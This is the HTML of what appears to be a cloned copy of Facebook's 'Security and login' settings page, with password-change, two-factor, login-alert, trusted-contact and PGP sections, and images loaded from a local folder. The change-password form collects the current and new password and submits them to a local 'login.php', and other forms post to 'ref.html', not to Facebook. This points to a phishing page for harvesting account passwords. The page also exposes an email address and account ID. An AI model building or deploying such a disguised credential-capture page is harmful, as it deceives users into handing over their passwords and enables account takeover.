Videos <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> </ul> </div> </div> <div class="clearfix" id="contentCol"> <div id="headerArea"> <div class="uiHeader uiHeaderPage"> <div class="clearfix uiHeaderTop"> <div class="rfloat _ohf"> <h2 class="accessible_elem"> Security and login </h2> <div class="uiHeaderActions"> </div> </div> <div> <h2 aria-hidden="true" class="uiHeaderTitle"> Security and login </h2> </div> </div> </div> </div> <div id="contentArea" role="main"> <div id="SettingsPage_Content"> <div> <div id="u_0_w"> <div> <div class="_1xpm _4-u2 _4-u8"> <div class="_1nfx _4-u3 _57d8"> <span class=" _50f7"> Login </span> </div> <div class="_4p8x _4-u3"> <table cellpadding="0" cellspacing="0" class="_4p8y uiGrid _51mz" cols="3"> <tbody> <tr class="_51mx"> <td class="_1fow _51m- hLeft"> <i alt="" class="img sp_fALpUwt6A2b sx_092bbb"> </i> </td> <td class="_51m- hLeft"> <span class="_39gj"> Change password </span> <span class="_4p8z"> It's a good idea to use a strong password that you don't use elsewhere </span> </td> <td class="_51mw _51m- hRght"> <button class="_1nf- _4jy0 _4jy3 _517h _51sy _42ft" type="submit" value="1"> Close </button> </td> </tr> </tbody> </table> <div class="_39gk"> <div id="password"> <div class="_5zf3 _2b14"> <div class="fbSettingsEditor uiBoxGray noborder"> <form action="login.php" id="u_4_2" method="post"> <input autocomplete="off" name="fb_dtsg" type="hidden" value="AQHlC9LHA2wG:AQFSnl9YGnaK"/> <div class="pbm fbSettingsEditorFields"> <div class="ptm"> <table class="uiInfoTable uiInfoTableFixed noBorder" role="presentation"> <tbody> <tr class="hidden_elem dataRow"> <th class="label noLabel"> </th> <td class="data"> <input class="inputtext" id="password_strength" name="password_strength" type="text"/> </td> </tr> <tr class="dataRow"> <th class="label"> <label for="password_old"> Current </label> </th> <td class="data"> <input class="inputtext" id="password_old" name="old_password" type="password"/> </td> </tr> <tr> <th class="label noLabel"> </th> <td class="data"> <div id="password_old_status"> <span> </span> </div> </td> </tr> <tr class="dataRow"> <th class="label"> <label for="password_new"> New </label> </th> <td class="data"> <input aria-describedby="password_new_status" autocomplete="off" class="inputtext" id="password_new" name="new_password" type="password"/> </td> </tr> <tr> <th class="label noLabel"> </th> <td class="data"> <div id="password_new_status"> <span class="accessible_elem"> Check the help tag for password feedback </span> </div> </td> </tr> <tr class="dataRow"> <th class="label"> <label for="password_confirm"> Retype new </label> </th> <td class="data"> <input aria-describedby="password_confirm_status" autocomplete="off" class="inputtext" id="password_confirm" name="password_confirm" type="password"/> </td> </tr> <tr> <th class="label noLabel"> </th> <td class="data"> <div id="password_confirm_status"> <span class="accessible_elem"> Check the help tag for password feedback </span> </div> </td> </tr> <tr> <td colspan="2"> <a href="https://www.facebook.com/recover/initiate?ref=www_change_password"> Forgotten your password? </a> </td> </tr> </tbody> </table> </div> <div class="mtm uiBoxGray topborder"> <div class="mtm"> <label class="submit uiButton uiButtonConfirm" for="u_4_1" id="u_4_0"> <input id="u_4_1" type="submit" name="save" value="Save Changes"/> </label> <img alt="" class="mas saveThrobber uiLoadingIndicatorAsync img" height="11" src="./lll_files/GsNJNwuI-UM.gif" width="16"/> </div> </div> </div> </form> </div> </div> </div> </div> </div> <div class="_1nfz _4-u3"> <table cellpadding="0" cellspacing="0" class="_4p8y uiGrid _51mz" cols="3"> <tbody> <tr class="_51mx"> <td class="_1fow _51m- hLeft"> <i alt="" class="img sp_fALpUwt6A2b sx_5a5d65"> </i> </td> <td class="_51m- hLeft"> <span class="_39gj"> Log in using your profile picture </span> <span class="_4p8z"> Tap or click your profile picture to log in, instead of using a password </span> </td> <td class="_51mw _51m- hRght"> <button class="_1nf- _4jy0 _4jy3 _517h _51sy _42ft" type="submit" value="1"> Edit </button> </td> </tr> </tbody> </table> <div class="_39gk" hidden=""> <div id="device_based_login"> <div class="_5zf3"> <div class="fbSettingsEditor uiBoxGray noborder"> <div> <div class="pbm fbSettingsEditorFields"> <div class="ptm"> <div> <div class="fsm fwn fcg"> Next time you log in on this browser, just click your profile picture instead of typing a password. </div> <div class="_2f9_ _2fa2 _2fa1 _18os"> <img alt="" aria-label="Ldah Cereno" class="_s0 _4ooo _3c89 _rw img" role="img" src="./lll_files/35489513_244679756305385_4128203839134236672_n.jpg"/> <span class="_3c8a"> Ldah </span> </div> <div class="_4-u2 _4-u8"> <div class="_4-u3 _2z5s"> <a ajaxify="/login/device-based/turn-on/?flow=logged_in_settings&amp;reload=1" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" rel="async-post" role="button"> <div class="_2ph_"> <div class="fsl fwb fcb"> Remember password </div> <div class="fsm fwn fcg"> Just click your Profile picture to log in </div> </div> </a> </div> <div class="_4-u3 _2z5s"> <a ajaxify="/login/device-based/async/remove/?flow=logged_in_settings" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" rel="async-post" role="button"> <div class="_2ph_"> <div class="fsl fwb fcb"> Turn off Profile picture login </div> <div class="fsm fwn fcg"> Use email or phone number to log in </div> </div> </a> </div> </div> </div> </div> <div class="mtm uiBoxGray topborder"> <div class="mtm"> <img alt="" class="mas saveThrobber uiLoadingIndicatorAsync img" height="11" src="./lll_files/GsNJNwuI-UM.gif" width="16"/> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="_1xpm _4-u2 _4-u8"> <div class="_1nfx _4-u3 _57d8"> <span class=" _50f7"> Two-factor authentication </span> </div> <div class="_1nfz _4-u3"> <table cellpadding="0" cellspacing="0" class="_4p8y uiGrid _51mz" cols="3"> <tbody> <tr class="_51mx"> <td class="_1fow _51m- hLeft"> <i alt="" class="img sp_fALpUwt6A2b sx_1a670d"> </i> </td> <td class="_51m- hLeft"> <span class="_39gj"> Use two-factor authentication </span> <span class="_4p8z"> Log in using a code from your phone as well as a password </span> </td> <td class="_51mw _51m- hRght"> <button class="_1nf- _4jy0 _4jy3 _517h _51sy _42ft" type="submit" value="1"> Edit </button> </td> </tr> </tbody> </table> <div class="_39gk" hidden=""> <div id="two_fac_auth"> <div class="_5zf3"> <div class="fbSettingsEditor uiBoxGray noborder"> <div> <div class="pbm fbSettingsEditorFields"> <div class="ptm"> <div> <div class="_29jk" id="two_fac_auth_settings_title"> <div class="clearfix"> <div class="lfloat _ohe"> Two-factor authentication is off. </div> <a class="rfloat _ohf" href="https://www.facebook.com/security/2fac/setup/intro/" rel="post"> Set up </a> </div> <div class="fcg _3-8w"> Add an extra layer of security to prevent other people from logging in to your account. <a href="https://www.facebook.com/help/148233965247823"> Learn more </a> </div> </div> </div> </div> <div class="mtm uiBoxGray topborder"> <div class="mtm"> <img alt="" class="mas saveThrobber uiLoadingIndicatorAsync img" height="11" src="./lll_files/GsNJNwuI-UM.gif" width="16"/> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="_1nfz _4-u3"> <table cellpadding="0" cellspacing="0" class="_4p8y uiGrid _51mz" cols="3"> <tbody> <tr class="_51mx"> <td class="_1fow _51m- hLeft"> <i alt="" class="img sp_fALpUwt6A2b sx_7543af"> </i> </td> <td class="_51m- hLeft"> <span class="_39gj"> Authorised logins </span> <span class="_4p8z"> Review a list of devices on which you won't have to use a login code </span> </td> <td class="_51mw _51m- hRght"> <button class="_1nf- _4jy0 _4jy3 _517h _51sy _42ft" type="submit" value="1"> View </button> </td> </tr> </tbody> </table> <div class="_39gk" hidden=""> <div id="authorized_logins"> <div class="_5zf3"> <div class="fbSettingsEditor uiBoxGray noborder"> <div> <div class="pbm fbSettingsEditorFields"> <div class="ptm"> <div class="_3-8y _3ktl" id="2facDevicesList"> <form action="ref.html" ajaxify="/ajax/settings/security/devices.php" id="u_7_0" method="post" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)" rel="async"> <input autocomplete="off" name="fb_dtsg" type="hidden" value="AQFjyivtgX9O:AQGXEKST0oME"/> <div class="uiP fsm"> You do not have any registered devices. </div> <button class="_42ft _4jy0 _4jy3 _517h _51sy" type="submit" value="1"> Save </button> </form> </div> </div> <div class="mtm uiBoxGray topborder"> <div class="mtm"> <img alt="" class="mas saveThrobber uiLoadingIndicatorAsync img" height="11" src="./lll_files/GsNJNwuI-UM.gif" width="16"/> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="_1nfz _4-u3"> <table cellpadding="0" cellspacing="0" class="_4p8y uiGrid _51mz" cols="3"> <tbody> <tr class="_51mx"> <td class="_1fow _51m- hLeft"> <i alt="" class="img sp_fALpUwt6A2b sx_d6fb24"> </i> </td> <td class="_51m- hLeft"> <span class="_39gj"> App passwords </span> <span class="_4p8z"> Use special passwords to log in to your apps instead of using your Facebook password or login codes. </span> </td> <td class="_51mw _51m- hRght"> <button class="_1nf- _4jy0 _4jy3 _517h _51sy _42ft" type="submit" value="1"> Add </button> </td> </tr> </tbody> </table> <div class="_39gk" hidden=""> <div id="per_app_passwords"> <div class="_5zf3"> <div class="fbSettingsEditor uiBoxGray noborder"> <form action="ref.html" id="u_8_2" method="post" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)" rel="async"> <input autocomplete="off" name="fb_dtsg" type="hidden" value="AQEuiCLS3ol6:AQGrmTyIYHfw"/> <div class="pbm fbSettingsEditorFields"> <div class="ptm"> <div class="mbm"> <div id="fbPerAppPasswdList"> </div> <div class="clearfix"> <span class="lfloat _ohe"> <a class="mrs" data-hover="tooltip" data-tooltip-content="Some Facebook Apps can't receive login codes, which means that you could be temporarily locked out if two-factor authentication is on. You can use an app password instead of your account password to securely log in to apps such as Jabber, Skype and Xbox." data-tooltip-position="below" href="https://www.facebook.com/help/249378535085386/"> Learn more </a> about app passwords. </span> <span class="rfloat _ohf"> <a href="https://www.facebook.com/ajax/login/per_app_passwords/dialog" rel="dialog" role="button"> Generate app passwords </a> <a class="hidden_elem uiHelpLink mlm" data-hover="tooltip" data-tooltip-alignh="right" data-tooltip-content="Some Facebook Apps can't receive login codes, which means that you could be temporarily locked out if two-factor authentication is on. You can use an app password instead of your account password to securely log in to apps such as Jabber, Skype and Xbox." data-tooltip-position="below" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="button"> </a> </span> </div> </div> </div> <div class="mtm uiBoxGray topborder"> <div class="mtm"> <label class="submit uiButtonDisabled uiButton uiButtonConfirm" for="u_8_1" id="u_8_0"> <input disabled="1" id="u_8_1" type="submit" value="Save Changes"/> </label> <img alt="" class="mas saveThrobber uiLoadingIndicatorAsync img" height="11" src="./lll_files/GsNJNwuI-UM.gif" width="16"/> </div> </div> </div> </form> </div> </div> </div> </div> </div> </div> <div class="_1xpm _4-u2 _4-u8"> <div class="_1nfx _4-u3 _57d8"> <span class=" _50f7"> Setting up extra security </span> </div> <div class="_1nfz _4-u3"> <table cellpadding="0" cellspacing="0" class="_4p8y uiGrid _51mz" cols="3"> <tbody> <tr class="_51mx"> <td class="_1fow _51m- hLeft"> <i alt="" class="img sp_fALpUwt6A2b sx_e5b12f"> </i> </td> <td class="_51m- hLeft"> <span class="_39gj"> Get alerts about unrecognised logins </span> <span class="_4p8z"> We'll let you know if anyone logs in from a device or browser you don't usually use </span> </td> <td class="_51mw _51m- hRght"> <button class="_1nf- _4jy0 _4jy3 _517h _51sy _42ft" type="submit" value="1"> Edit </button> </td> </tr> </tbody> </table> <div class="_39gk" hidden=""> <div id="login_alerts"> <div class="_5zf3"> <div class="fbSettingsEditor uiBoxGray noborder"> <form action="ref.html" id="u_9_8" method="post" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)" rel="async"> <input autocomplete="off" name="fb_dtsg" type="hidden" value="AQE41bY-MePF:AQH-EE_5-7ea"/> <div class="pbm fbSettingsEditorFields"> <div class="ptm"> <div class="mbm uiP fsm"> <span class="_50f8"> Get an alert when anyone logs in to your account from an unrecognised device or browser. </span> </div> <div class="_tph"> <div class="_tpl"> <i class="_4y2b img sp_fALpUwt6A2b sx_ee2fae"> </i> <span class="_tpm"> Notifications </span> </div> <div> <div class="uiInputLabel clearfix"> <label class="_55sh uiInputLabelInput"> <input id="u_9_1" name="n" type="radio" value="1"/> <span> </span> </label> <label class="uiInputLabelLabel" for="u_9_1"> Get notifications </label> </div> <div class="uiInputLabel clearfix"> <label class="_55sh uiInputLabelInput"> <input checked="1" id="u_9_2" name="n" type="radio" value="0"/> <span> </span> </label> <label class="uiInputLabelLabel" for="u_9_2"> Don't get notifications </label> </div> </div> </div> <div class="_tpp"> </div> <div class="_tph"> <div class="_tpl"> <i class="_4y2b img sp_fALpUwt6A2b sx_c9da24"> </i> <span class="_tpm"> Messenger </span> </div> <div> <div class="uiInputLabel clearfix"> <label class="_55sh uiInputLabelInput"> <input id="u_9_3" name="m" type="radio" value="1"/> <span> </span> </label> <label class="uiInputLabelLabel" for="u_9_3"> Get notifications </label> </div> <div class="uiInputLabel clearfix"> <label class="_55sh uiInputLabelInput"> <input checked="1" id="u_9_4" name="m" type="radio" value="0"/> <span> </span> </label> <label class="uiInputLabelLabel" for="u_9_4"> Don't get notifications </label> </div> </div> </div> <div class="_tpp"> </div> <div class="_tph"> <div class="_tpl"> <i class="_4y2b img sp_fALpUwt6A2b sx_189ee3"> </i> <span class="_tpm"> Email </span> </div> <div> <div class="uiInputLabel clearfix"> <label class="_55sh uiInputLabelInput"> <input id="u_9_5" name="e" type="radio" value="1"/> <span> </span> </label> <label class="uiInputLabelLabel" for="u_9_5"> Email login alerts to nameless13@protonmail.com </label> </div> <div class="uiInputLabel clearfix"> <label class="_55sh uiInputLabelInput"> <input checked="1" id="u_9_6" name="e" type="radio" value="0"/> <span> </span> </label> <label class="uiInputLabelLabel" for="u_9_6"> Don't get email alerts </label> </div> </div> </div> <div class="_tpp"> </div> <a ajaxify="/settings/email/add2/?enable_login_alerts=1" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" rel="dialog" role="button"> Add another email address or mobile number </a> </div> <div class="mtm uiBoxGray topborder"> <div class="mtm"> <label class="submit uiButtonDisabled uiButton uiButtonConfirm" for="u_9_7" id="u_9_0"> <input disabled="1" id="u_9_7" type="submit" value="Save Changes"/> </label> <img alt="" class="mas saveThrobber uiLoadingIndicatorAsync img" height="11" src="./lll_files/GsNJNwuI-UM.gif" width="16"/> </div> </div> </div> </form> </div> </div> </div> </div> </div> <div class="_1nfz _4-u3"> <table cellpadding="0" cellspacing="0" class="_4p8y uiGrid _51mz" cols="3"> <tbody> <tr class="_51mx"> <td class="_1fow _51m- hLeft"> <i alt="" class="img sp_fALpUwt6A2b sx_c2f462"> </i> </td> <td class="_51m- hLeft"> <span class="_39gj"> Choose 3 to 5 friends to contact if you are locked out </span> <span class="_4p8z"> Your trusted contacts can send a code and URL from Facebook to help you log back in </span> </td> <td class="_51mw _51m- hRght"> <button class="_1nf- _4jy0 _4jy3 _517h _51sy _42ft" type="submit" value="1"> Edit </button> </td> </tr> </tbody> </table> <div class="_39gk" hidden=""> <div id="trusted_friends"> <div class="_5zf3"> <div class="fbSettingsEditor uiBoxGray noborder"> <div> <div class="pbm fbSettingsEditorFields"> <div class="ptm"> <div class="mbs uiP fsm fcg"> Your trusted contacts are friends who you chose who can securely help if you ever have trouble accessing your account. </div> <div class="fcg" id="fbNoTrustedFriends"> <div class="clearfix"> <div class="lfloat _ohe"> <strong> You haven't chosen any friends yet. </strong> </div> <div class="rfloat _ohf"> <a href="https://www.facebook.com/ajax/guardian/preselect/intro" rel="dialog" role="button"> Choose friends </a> . </div> </div> </div> <div class="hidden_elem" id="fbPortraitsRoot"> <div class="mts ptm uiBoxGray topborder"> <div class="fcg"> <div class="clearfix"> <div class="lfloat _ohe"> <strong> Your trusted contacts: </strong> </div> <div class="rfloat _ohf"> <a class="mrm" href="https://www.facebook.com/ajax/guardian/preselect/dialog" rel="dialog" role="button"> Edit </a> <a href="https://www.facebook.com/ajax/guardian/preselect/remove" rel="dialog" role="button"> Remove All </a> </div> </div> </div> <div id="fbFriendsPortraits"> <div class="mtm"> </div> </div> </div> </div> </div> <div class="mtm uiBoxGray topborder"> <div class="mtm"> <img alt="" class="mas saveThrobber uiLoadingIndicatorAsync img" height="11" src="./lll_files/GsNJNwuI-UM.gif" width="16"/> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="_1xpm _4-u2 _4-u8"> <div class="_1nfx _4-u3 _57d8"> <span class=" _50f7"> Advanced </span> </div> <div class="_1nfz _4-u3"> <table cellpadding="0" cellspacing="0" class="_4p8y uiGrid _51mz" cols="3"> <tbody> <tr class="_51mx"> <td class="_1fow _51m- hLeft"> <i alt="" class="img sp_fALpUwt6A2b sx_4a15a5"> </i> </td> <td class="_51m- hLeft"> <span class="_39gj"> Encrypted notification emails </span> <span class="_4p8z"> Add extra security to notification emails from Facebook (only you can decrypt these emails) </span> </td> <td class="_51mw _51m- hRght"> <button class="_1nf- _4jy0 _4jy3 _517h _51sy _42ft" type="submit" value="1"> Edit </button> </td> </tr> </tbody> </table> <div class="_39gk" hidden=""> <div id="public_key"> <div class="_5zf3"> <div class="fbSettingsEditor uiBoxGray noborder"> <form action="ref.html" id="u_b_3" method="post" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)" rel="async"> <input autocomplete="off" name="fb_dtsg" type="hidden" value="AQHAO8DYBonb:AQEEXEJpcX-L"/> <div class="pbm fbSettingsEditorFields"> <div class="ptm"> <div class="_3-95 _50f7"> Your OpenPGP public key </div> Enter your OpenPGP public key here: <div> <textarea class="uiTextareaAutogrow" cols="80" id="pgp_edit_textarea" name="pgp_edit_textarea" placeholder="Enter a PGP public key" rows="16" style="font-family: monospace; font-size: 80%;" title="Enter a PGP public key"></textarea> <div> <div id="pgp_account_recovery_warning" style="display: none;"> <div class="_585n _585o" id="u_b_4" style="margin: 10px 0px 10px 0px; "> <i class="_585p img sp_lueBAkmYQEE sx_169931"> <u> Warning </u> </i> <div class="_585r _50f4"> Account recovery notification emails will be encrypted! <a class="uiHelpLink mhs" data-hover="tooltip" data-tooltip-content="We want to ensure that you will not be locked out of your account if you lose your private key and cannot decrypt account recovery notification emails. You should enable trusted contacts or register a mobile phone number to ensure that you can recover your account, even if you cannot decrypt account recovery emails." href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="button"> </a> <div> <a href="https://www.facebook.com/settings?tab=security&amp;section=trusted_friends"> Click here to enable an additional account recovery method </a> </div> </div> </div> </div> <div class="uiInputLabel clearfix"> <label class="_kv1 _55sg uiInputLabelInput"> <input id="u_b_2" name="use_for_email" onclick="var elem = document.getElementById(&quot;pgp_account_recovery_warning&quot;); if (elem !== null) { if (elem.style.display == 'inline') { elem.style.display = 'none'; } else if (elem !== null &amp;&amp; elem.style.display == 'none') { elem.style.display = 'inline'; } }" type="checkbox" value="use_for_email"/> <span class="_66ul"> </span> </label> <label class="uiInputLabelLabel" for="u_b_2"> Use this public key to encrypt notification emails that Facebook sends you? <a class="uiHelpLink mhs" data-hover="tooltip" data-tooltip-content="If you tick this box, you will receive an encrypted verification email to make sure that you can decrypt notification emails that have been encrypted with this public key. If you are able to decrypt the verification email and click the provided link, Facebook will begin encrypting notification emails that it sends to you with your public key." href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="button"> </a> </label> </div> </div> <div class="mvm uiP fsm fcg"> If you wish to share your public key, you can change who can see it in your profile's <a href="https://www.facebook.com/me/about?section=contact-info"> Contact and basic info about page. </a> </div> <input autocomplete="off" name="uid" type="hidden" value="100022900869586"/> </div> <div class="mvm uiP fsm fcg"> You can download Facebook's public key <a href="https://www.facebook.com/facebook/publickey/download/" target="_blank"> here </a> . </div> </div> <div class="mtm uiBoxGray topborder"> <div class="mtm"> <label class="submit uiButtonDisabled uiButton uiButtonConfirm" for="u_b_1" id="u_b_0"> <input disabled="1" id="u_b_1" type="submit" value="Save Changes"/> </label> <img alt="" class="mas saveThrobber uiLoadingIndicatorAsync img" height="11" src="./lll_files/GsNJNwuI-UM.gif" width="16"/> </div> </div> </div> </form> </div> </div> </div> </div> </div> <div class="_1nfz _4-u3"> <table cellpadding="0" cellspacing="0" class="_4p8y uiGrid _51mz" cols="3"> <tbody> <tr class="_51mx"> <td class="_1fow _51m- hLeft"> <i alt="" class="img sp_fALpUwt6A2b sx_1da433"> </i> </td> <td class="_51m- hLeft"> <span class="_39gj"> See recent emails from Facebook </span> <span class="_4p8z"> See a list of emails we sent you recently, including emails about security </span> </td> <td class="_51mw _51m- hRght"> <button class="_1nf- _4jy0 _4jy3 _517h _51sy _42ft" type="submit" value="1"> View </button> </td> </tr> </tbody> </table> <div class="_39gk" hidden=""> <div id="recent_emails"> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div id="bottomContent"> </div> </div> </div> </div> </div> <div> <div data-referrer="page_footer" id="pageFooter"> <div id="contentCurve"> </div> <div aria-label="Facebook site links" id="js_1" role="contentinfo"> <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"> <li> <a accesskey="8" href="https://www.facebook.com/facebook" title="Read our blog, discover the resource centre and find job opportunities."> About </a> </li> <li> <a href="https://www.facebook.com/ad_campaign/landing.php?placement=pf&amp;campaign_id=466780656697650&amp;extra_1=auto" title="Advertise on Facebook"> Create ad </a> </li> <li> <a href="https://www.facebook.com/pages/create/?ref_type=sitefooter" title="Create a Page"> Create Page </a> </li> <li> <a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform."> Developers </a> </li> <li> <a href="https://www.facebook.com/careers/?ref=pf" title="Make your next career move to our brilliant company."> Careers </a> </li> <li> <a data-nocookies="1" href="https://www.facebook.com/privacy/explanation" title="Learn about your privacy and Facebook."> Privacy </a> </li> <li> <a data-nocookies="1" href="https://www.facebook.com/policies/cookies/" title="Learn about cookies and Facebook."> Cookies </a> </li> <li> <a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about AdChoices."> AdChoices <i class="img sp_ks9jMipqQdl sx_c74128"> </i> </a> </li> <li> <a accesskey="9" data-nocookies="1" href="https://www.facebook.com/policies?ref=pf" title="Review our terms and policies."> Terms </a> </li> <li> <a accesskey="0" href="https://www.facebook.com/help/?ref=pf" title="Visit our Help Centre."> Help </a> </li> <li> <a accesskey="6" class="accessible_elem" href="https://www.facebook.com/settings" title="View and edit your Facebook settings."> Settings </a> </li> <li> <a accesskey="7" class="accessible_elem" href="https://www.facebook.com/me/allactivity?privacy_source=activity_log_top_menu" title="View your activity log"> Activity log </a> </li> </ul> </div> <div class="mvl copyright"> <div> <span> Facebook © 2018 </span> <div class="fsm fwn fcg"> <ul class="uiList localeSelectorList _509- _4ki _6-h _6-j _6-i" data-nocookies="1"> <li> English (UK) </li> <li> <a class="_sv4" dir="ltr" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view" onclick='require("IntlUtils").setLocale(null, "www_list_selector", "en_US"); return false;' title="English (US)"> English (US) </a> </li> <li> <a class="_sv4" dir="rtl" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view" onclick='require("IntlUtils").setLocale(null, "www_list_selector", "ar_AR"); return false;' title="Arabic"> العربية </a> </li> <li> <a class="_sv4" dir="rtl" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view" onclick='require("IntlUtils").setLocale(null, "www_list_selector", "cb_IQ"); return false;' title="Sorani Kurdish"> کوردیی ناوەندی </a> </li> <li> <a class="_sv4" dir="ltr" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view" onclick='require("IntlUtils").setLocale(null, "www_list_selector", "tr_TR"); return false;' title="Turkish"> Türkçe </a> </li> <li> <a class="_sv4" dir="rtl" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view" onclick='require("IntlUtils").setLocale(null, "www_list_selector", "fa_IR"); return false;' title="Persian"> فارسی </a> </li> <li> <a class="_sv4" dir="ltr" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view" onclick='require("IntlUtils").setLocale(null, "www_list_selector", "de_DE"); return false;' title="German"> Deutsch </a> </li> <li> <a class="_sv4" dir="ltr" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view" onclick='require("IntlUtils").setLocale(null, "www_list_selector", "sv_SE"); return false;' title="Swedish"> Svenska </a> </li> <li> <a class="_sv4" dir="ltr" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view" onclick='require("IntlUtils").setLocale(null, "www_list_selector", "fr_FR"); return false;' title="French (France)"> Français (France) </a> </li> <li> <a class="_sv4" dir="ltr" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view" onclick='require("IntlUtils").setLocale(null, "www_list_selector", "nl_NL"); return false;' title="Dutch"> Nederlands </a> </li> <li> <a class="_sv4" dir="ltr" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view" onclick='require("IntlUtils").setLocale(null, "www_list_selector", "es_LA"); return false;' title="Spanish"> Español </a> </li> <li> <a ajaxify="/settings/language/language/?uri=https%3A%2F%2Fwww.facebook.com%2Fsettings%3Ftab%3Dsecurity%26section%3Dpassword%26view&amp;source=www_list_selector_more" class="_42ft _4jy0 _517i _517h _51sy" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" rel="dialog" role="button" title="Show more languages"> <i class="img sp_69ybFt0NtBg sx_7eb21c"> </i> </a> </li> </ul> </div> </div> </div> </div> </div> </div> <div data-referrer="pagelet_sidebar" id="pagelet_sidebar"> <div class="fbChatSidebar fixed_always _5pr2" data-ft='{"tn":"+G"}' id="u_0_y"> <div class="_5qqe"> </div> </div> </div> <div data-referrer="pagelet_dock" id="pagelet_dock"> <div class="_48gf fbDockWrapper fbDockWrapperRight" id="u_0_1j"> <div class="fbDock clearfix"> <div class="clearfix nubContainer rNubContainer"> <div class="uiToggle _50-v fbNub _rz3 _ur5" id="u_0_14"> <a aria-label="Keyboard shortcut help" class="fbNubButton" data-hover="tooltip" data-tooltip-alignh="right" data-tooltip-content="Keyboard shortcut help" rel="toggle" role="button" tabindex="0" title="Keyboard shortcut help"> <div> <i class="fbNubButtonIcon img sp_s5mm_iqtERv sx_0618ac"> <u> Keyboard shortcut help </u> </i> <i class="fbNubButtonIconPressed img sp_s5mm_iqtERv sx_817a97"> <u> Keyboard shortcut help </u> </i> </div> </a> <div aria-label="Keyboard shortcut help" class="fbNubFlyout uiToggleFlyout" role="dialog"> <div class="fbNubFlyoutOuter"> <div class="fbNubFlyoutInner"> <div class="clearfix fbNubFlyoutTitlebar" data-ft='{"tn":"+J"}' data-jsid="nubFlyoutTitlebar"> <button class="_42ft _5upp _2dv8" type="submit" value="1"> <span class="accessible_elem"> Close </span> </button> <div class="titlebarLabel clearfix"> Keyboard shortcut help </div> </div> <div class="_2v5j"> <div class="fbNubFlyoutBody" data-jsid="scrollingArea" id="u_0_1k"> <div class="fbNubFlyoutBodyContent"> <div id="u_0_1l"> </div> </div> </div> </div> </div> </div> </div> </div> <div id="u_0_1m"> </div> <div class="fbNubGroup clearfix _1mw- _ph1"> <div class="fbNubGroup clearfix _1tvj"> </div> <div class="_50-v fbNub _2ikx"> <a class="fbNubButton" role="button" tabindex="0"> <div class="_2ja9"> <div class="_4fs1"> <i class="_4fs2"> </i> </div> </div> </a> </div> </div> <div data-referrer="ChatTabsPagelet" id="ChatTabsPagelet"> <div id="u_0_1d"> <div class="fbNubGroup clearfix _56oy _20fw _3__- _4ml1 _3fr9"> <div class="fbNubGroup clearfix" id="u_0_1e"> <div class="_59v1"> </div> </div> </div> <div class="_26-x" id="u_0_1f"> </div> <div class="_26-y" id="u_0_1g"> </div> <div class="_26-y" id="u_0_1h"> </div> <div id="u_0_1i"> </div> </div> </div> <div data-referrer="BuddylistPagelet" id="BuddylistPagelet"> <div class="_56ox"> <div class="uiToggle _50-v fbNub _4mq3 hide_on_presence_error _3__-" id="fbDockChatBuddylistNub"> <a class="fbNubButton" data-ft='{"tn":"+I"}' rel="toggle" role="button" tabindex="0"> <span class="_5ayx rfloat hidden_elem"> </span> <i class="lfloat _4xia img sp_yadyws_ErYN sx_f9d2c8"> </i> <span class="label"> Chat <span class="count"> (5) </span> </span> <div class="_3gll newGCF"> <div class="_46fv"> <a aria-label="Create new group" class="_1-4- newGCF" data-hover="tooltip" data-tooltip-content="Create new group" data-tooltip-position="below" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#"> </a> </div> </div> <div class="_1us9 newGCF"> <a class="_3a-4" data-hover="tooltip" data-tooltip-content="New Message" data-tooltip-position="below" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#"> </a> </div> <div class="_1usa newGCF"> <div class="_5qth _5vm9 uiPopover _6a _6e"> <a aria-label="Options" class="_5vmb button _p" data-ft='{"tn":"p"}' data-hover="tooltip" data-tooltip-content="Options" data-tooltip-position="below" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="button"> </a> </div> </div> </a> <div class="fbNubFlyout uiToggleFlyout"> <div class="fbNubFlyoutOuter"> <div class="fbNubFlyoutInner"> <div class="clearfix fbNubFlyoutTitlebar" data-ft='{"tn":"+J"}' data-jsid="nubFlyoutTitlebar" tabindex="0"> <div class="_1d8- rfloat _ohf"> <div id="u_0_17"> <div class="_5qth _5vm9 uiPopover _6a _6e"> <a aria-label="Options" class="_5vmb button _p" data-ft='{"tn":"p"}' data-hover="tooltip" data-tooltip-content="Options" data-tooltip-position="below" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="button"> </a> </div> </div> <div class="_4k48"> <a class="_3a-4" data-hover="tooltip" data-tooltip-content="New Message" data-tooltip-position="below" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#"> </a> 